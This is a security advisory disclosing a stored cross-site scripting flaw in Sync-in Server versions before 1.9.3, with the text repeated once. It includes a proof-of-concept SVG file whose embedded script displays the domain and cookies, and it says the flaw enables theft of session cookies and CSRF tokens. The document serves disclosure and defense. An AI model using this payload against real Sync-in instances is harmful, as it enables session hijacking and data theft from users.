x0root/Advisory.txt

## Advisory.txt
Sync-in stored XSS vulnerability

Vulnerability: Stored Cross-Site Scripting (XSS) in Sync-in Server
Affected Versions: < 1.9.3
Fixed Version: 1.9.3
Reported Date: 12/06/2025
Researcher: x0root

Technical Details

Type: Stored Cross-Site Scripting (XSS)
Attack Vector: Remote
Impact: Information Disclosure, Privilege Escalation

Description
A stored cross-site scripting vulnerability exists in Sync-in Server versions prior to 1.9.3. Authenticated attackers can upload malicious SVG files containing JavaScript payloads. When victims access the raw SVG file URL directly, the embedded JavaScript executes within the victim's browser context under the Sync-in domain. This allows theft of CSRF tokens, session cookies, and other sensitive data.

Affected Component
· Raw file viewer endpoint serving SVG content without proper sanitization
· File upload functionality accepting SVG files

Proof of Concept

1. Authenticate to the Sync-in instance
2. Upload an SVG file containing:
   ```svg
   <?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain)
      alert(document.cookie)
      alert("xss")
   </script>
</svg>
   ```
3. Share the raw file URL with victim
4. When victim opens the raw URL, JavaScript executes

Mitigation
· Upgrade to Sync-in Server version 1.9.3 or later

References
· GitHub Release (Fix): https://github.com/Sync-in/server/releases/tag/v1.9.3
· GitHub Gist: https://gist.github.com/x0root/86db30af91bb0e1707eb7e57a049b6ad
	Sync-in stored XSS vulnerability

	Vulnerability: Stored Cross-Site Scripting (XSS) in Sync-in Server
	Affected Versions: < 1.9.3
	Fixed Version: 1.9.3
	Reported Date: 12/06/2025
	Researcher: x0root

	Technical Details

	Type: Stored Cross-Site Scripting (XSS)
	Attack Vector: Remote
	Impact: Information Disclosure, Privilege Escalation

	Description
	A stored cross-site scripting vulnerability exists in Sync-in Server versions prior to 1.9.3. Authenticated attackers can upload malicious SVG files containing JavaScript payloads. When victims access the raw SVG file URL directly, the embedded JavaScript executes within the victim's browser context under the Sync-in domain. This allows theft of CSRF tokens, session cookies, and other sensitive data.

	Affected Component
	· Raw file viewer endpoint serving SVG content without proper sanitization
	· File upload functionality accepting SVG files

	Proof of Concept

	1. Authenticate to the Sync-in instance
	2. Upload an SVG file containing:
	```svg
	<?xml version="1.0" encoding="UTF-8" standalone="no"?>
	<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
	<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
	<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
	<script type="text/javascript">
	alert(document.domain)
	alert(document.cookie)
	alert("xss")
	</script>
	</svg>
	```
	3. Share the raw file URL with victim
	4. When victim opens the raw URL, JavaScript executes

	Mitigation
	· Upgrade to Sync-in Server version 1.9.3 or later

	References
	· GitHub Release (Fix): https://github.com/Sync-in/server/releases/tag/v1.9.3
	· GitHub Gist: https://gist.github.com/x0root/86db30af91bb0e1707eb7e57a049b6ad
No results found